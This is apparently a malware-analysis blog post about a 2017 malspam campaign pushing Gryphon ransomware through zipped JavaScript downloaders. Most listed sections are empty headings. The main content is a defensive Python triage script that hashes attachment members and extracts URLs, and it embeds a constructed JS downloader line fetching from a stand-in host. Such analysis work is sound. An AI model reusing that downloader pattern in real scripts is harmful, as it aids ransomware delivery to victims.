2017-08-02 - "BLANK SLATE" MALSPAM PUSHING GRYPHON RANSOMWARE (A BTCWARE VARIANT)

ASSOCIATED FILES:

SOME BACKGROUND:

TODAY'S NOTES (UPDATED 2017-08-03):


EMAILS


Shown above:  Spreadsheet tracker with 4 examples today.



Shown above:  One of the attached zip archives and its contents.


TRAFFIC


Shown above:  Traffic from an infection filtered in Wireshark.


URLS GENERATED BY THE EXTRACTED .JS FILES TO GET THE RANSOMWARE:


EMAIL FROM THE DECRYPTION INSTRUCTIONS:


SHA256 HASHES

FILE ATTACHMENTS (ZIP ARCHIVES):


EXTRACTED .JS FILES:


GRYPHON RANSOMWARE SAMPLE:

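The sections above list the three artifact layers of this campaign: the zip attachments, the .js downloaders inside them, and the ransomware executable they retrieve. The following triage helper is an added example and is not code from the original post or from the campaign; it opens an attachment without executing anything, flags script members by extension, hashes each member with SHA256 for matching against published indicators, and pulls plain-text URLs out of any script. The zip archive, the member name and the downloader URL it contains are constructed here for the demonstration (the reserved .invalid TLD is used so nothing on the page is imitated); real downloaders of this kind usually build their URL from concatenated or encoded fragments, which the simple regex below will not recover.

```python
"""Static triage of a zipped script attachment (added example, not from the original post)."""
import hashlib
import io
import pathlib
import re
import zipfile

# Windows Script Host / HTML Application extensions that run with a double-click.
SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta"}

# Plain http(s) URLs embedded as literal strings in the script body.
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")

# Constructed downloader body (assumption, not the campaign's real script).
SAMPLE_JS = (
    b'var u = "http://example.invalid/gryphon/load.php?id=1";\n'
    b'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
    b'x.open("GET", u, false); x.send();\n'
)


def sha256_hex(data: bytes) -> str:
    """Hex SHA256 of a member's bytes, the form used in the hash lists on this page."""
    return hashlib.sha256(data).hexdigest()


def triage_zip(zip_bytes: bytes) -> list:
    """Return one record per archive member; nothing is written to disk or executed."""
    records = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            suffixes = pathlib.PurePosixPath(info.filename.lower()).suffixes
            ext = suffixes[-1] if suffixes else ""
            is_script = ext in SCRIPT_EXTENSIONS
            # A second extension such as invoice.pdf.js is a common lure; flag it.
            double_extension = is_script and len(suffixes) > 1
            urls = []
            if is_script:
                urls = sorted({m.decode("ascii", "replace") for m in URL_RE.findall(data)})
            records.append({
                "name": info.filename,
                "size": len(data),
                "sha256": sha256_hex(data),
                "is_script": is_script,
                "double_extension": double_extension,
                "urls": urls,
            })
    return records


def build_constructed_sample() -> bytes:
    """Build an in-memory zip shaped like the attachments described above (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_8831.js", SAMPLE_JS)
    return buf.getvalue()


if __name__ == "__main__":
    for rec in triage_zip(build_constructed_sample()):
        flag = "SCRIPT" if rec["is_script"] else "other"
        print(f"{rec['sha256']}  {rec['name']}  [{flag}]")
        for url in rec["urls"]:
            print(f"    url: {url}")
```

Run it against a real attachment by reading the zip file's bytes and passing them to triage_zip(); the SHA256 values it prints are what you would compare against the hash lists in a post like this one, and the URL list is the starting point for the traffic filter shown in the Wireshark screenshot.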

IMAGES


Shown above:  Some encrypted files on a Windows host infected with today's Gryphon sample.



Shown above:  Gryphon ransomware decryption instructions.


FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
